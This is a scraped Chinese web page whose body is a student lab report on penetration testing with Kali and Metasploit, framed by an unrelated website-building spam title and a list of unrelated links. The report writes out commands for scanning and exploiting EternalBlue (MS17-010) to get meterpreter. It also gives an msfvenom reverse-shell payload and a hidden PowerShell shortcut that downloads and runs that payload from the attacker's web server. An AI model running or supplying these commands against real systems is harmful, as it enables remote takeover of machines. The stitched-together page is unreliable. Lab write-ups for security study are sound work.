当前位置: 首页 > news >正文

建设网站的公司兴田德润实力强怎么添加字体在wordpress

建设网站的公司兴田德润实力强,怎么添加字体在wordpress,单页网站多钱,网站优化排名多少钱实验 2 基于 KALI 和 Metasploit 的渗透测试 2.1 实验名称 《基于 KALI 和 Metasploit 的渗透测试》 2.2 实验目的 1 、熟悉渗透测试方法 2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用 2.3 实验步骤及内容 1 、安装 Kali 系统 2 、选择 Kali 中 1-2 种攻击工具#xff0c… 实验 2  基于 KALI 和 Metasploit 的渗透测试 2.1 实验名称 《基于 KALI 和 Metasploit 的渗透测试》 2.2 实验目的 1 、熟悉渗透测试方法 2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用 2.3 实验步骤及内容 1 、安装 Kali 系统 2 、选择 Kali 中 1-2 种攻击工具记录攻击的主要步骤和攻击结果截图。 攻击一使用 MSF 复现“永恒之蓝”漏洞 实验环境Win7关闭防火墙开启 SMB 服务 Kali Linuxmetasploit-framework 6.2.26 1  启动 Metasploit 终端里输入 msfconsole 2  查询利用模块 终端里输入 search ms17_010 可以看到有哪些模块可以利用 3  使用探测模块 终端内输入 use auxiliary/scanner/smb/smb_ms17_010 4  设置探测范围 终端内输入 show options 在这里需要配置一个 RHOSTS。 终端内输入 set rhosts 192.168.3.0/24 设置扫描当前网段 或可以设置范围 set rhosts 192.168.3.1- 192.168.3.10。 5  开始探测 终端内输入 run 执行探测。 根据上图我们可以看到 192.168.3.8  这个 IP 的机器可能存在漏洞。 6  开始漏洞利用 首先在终端里输入 search ms17_010 使用模块 use exploit/windows/smb/ms17_010_eternalblue。 7  配置利用模块 配置模块 show options  配置靶机 set rhost 192.168.3.8  这里 IP 填第五步探测到的 IP。  8  执行攻击 在终端里输入 run 。看到 win 说明攻击成功拿到 meterpreter。 攻击二“震网三代”反弹 shell 实验环境Win10关闭防火墙 Kali Linuxmetasploit-framework 6.2.26 1 、使用 MSF 创建一个后门 msf  内 输 入 msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost 192.168.3.23 lport4456 -fpsh-reflection/var/www/html/link.ps1 2 、在 kali 下开启 apache2 终端内输入service apache2 start 3 、在受控机上创建快捷方式 powershell       -windowstyle       hidden       -exec       bypass       -c       IEX       (New-Object Net.WebClient).DownloadString(http://192.168.204.135/link.ps1);test.ps1 4  回到 MSF 终端配置监听 msf 内输入 use exploit/multi/handler 5  配置 payload set payload windows/x64/meterpreter/reverse_tcp msf 中输入show options  配置 payload 设置 LHOST  和 LPORT maf 中输入 set lhost 当前机器 ip  设置 LHOST set lport 未被占用的端口  设置 LPORT 6 、执行监听 msf 中输入run 或者 exploit 进入靶机执行我们在靶机上创建的快捷方式稍等片刻获取到 meterpreter。 2.4 实验关键过程及其分析 攻击一使用 MSF 复现“永恒之蓝 ”漏洞 CVE-2017-0144 即永恒之蓝最早爆发于 2017 年 4 月 14 日晚是一种利用 Windows 系统的 SMB 协议漏洞来获取系统的最高权限 以此来控制被入侵的计算机。甚至于 2017年 5 月 12 日 不法分子通过改造“永恒之蓝”制作了勒索病毒使全世界大范围内遭受了勒索病毒甚至波及到学校、大型企业、政府等机构只能通过支付高额的赎金才能恢复出文件。 SMB 是一个协议服务器信息块它是一种客户机/服务器、请求/响应协议通过 SMB 协议可以在计算机间共享文件、打印机、命名管道等资源 电脑上的网上邻居就是靠 SMB  实现的SMB 协议工作在应用层和会话层可以用在 TCP/IP 协议之上SMB 使用 TCP139端口和 TCP445 端口。 SMB 工作原理 1首先客户端发送一个 SMB negport  请求数据报并列出它所支持的所有 SMB 的协 议版本。服务器收到请求消息后响应请求并列出希望使用的 SMB 协议版本。如果没有可以使用的协议版本则返回 0XFFFFH 结束通信。 2协议确定后客户端进程向服务器发起一个用户或共享的认证这个过程是通过发送 SessetupX 请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器然后通过服务器发送一个 SessetupX 应答数据包来允许或拒绝本次连接。 3当客户端和服务器完成了磋商和认证之后它会发送一个 Tcon或 TconX SMB 数据报 并列出它想访问的网络资源的名称之后会发送一个 TconX 应答数据报以表示此次连接是否接收或拒绝。 4连接到相应资源后SMB 客户端就能够通过open SMB 打开一个文件通过 read SMB 读取文件通过write SMB 写入文件通过 close SMB 关闭文件。 永恒之蓝是在 Windows 的 SMB 服务处理 SMB v1 请求时发生的漏洞这个漏洞导致攻 击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放 445 文件共享端口的 Windows 机器无需用户任何操作只要开机上网不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 攻击二“震网三代 ”反弹 shell 2017 年 6 月 13 日微软官方发布编号为 CVE-2017-8464 的漏洞公告官方介绍 Windows 系统在解析快捷方式时存在远程执行任意代码的高危漏洞黑客可以通过 U 盘、网络共享 等途径触发漏洞完全控制用户系统安全风险高危传播的载体一般是 lnklnk 是 windows 系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击 lnk 的 U 盘后会反弹 shell 哪怕是被隔离的内网也可以在不上网的情况下被攻击。 这种漏洞通过创建恶意快捷方式包含恶意执行脚本点击恶意快捷方式导致本机中病毒并且被远控。
http://www.w-s-a.com/news/810079/

相关文章:

  • 网站开发文档东莞市建设网站首页
  • 公共空间设计网站企业门户网站建设教程
  • 网站建设公司 深圳镇江建设质量监督站网站
  • 网站底部版权怎么做软广告经典案例
  • 网站收录突然全部没有了东莞网站建设公司电话
  • 境外企业网站推广免费ppt元素
  • 2018网站建设行业广东网站seo
  • 网站后台加密云服务器2008做网站
  • dw制作一个环保网站模板下载吉安网站建设收费
  • 深圳珠宝网站设计北京高端网站建设优势
  • 合肥企业制作网站wordpress创建网站
  • 织梦网站开发兼职wordpress 中间截取缩略图
  • 南通制作网站旅游搭建网站
  • 专业做商铺的网站个人网页html模板完整代码
  • 什么网站做美食最好最专业关键词推广是什么意思
  • 自助建设网站软件网站导航网站可以做吗
  • 网站模板放哪长沙网站优化分析
  • 泉州网站建设价钱网站模板素材
  • 南通网站托管js建设网站外网
  • 成都企业网站公司wordpress内页模板
  • 58同城建网站怎么做wordpress评论显示数字ip
  • 免费制作论坛网站模板免费下载北京网站制作长沙
  • 旅游网网站建设网站如何自己做seo
  • 如何验证网站所有权做二手家具回收哪个网站好
  • 做哪种网站赚钱项目开发流程
  • 网站建设和网站网络推广网站建设软件定制
  • 站长工具网址查询全球云邮登陆网站
  • 宁波 住房和建设局网站网上发帖推广
  • 平面设计在线网站工业设计公司有哪些
  • 福州网站设计外包公司网站做的比较好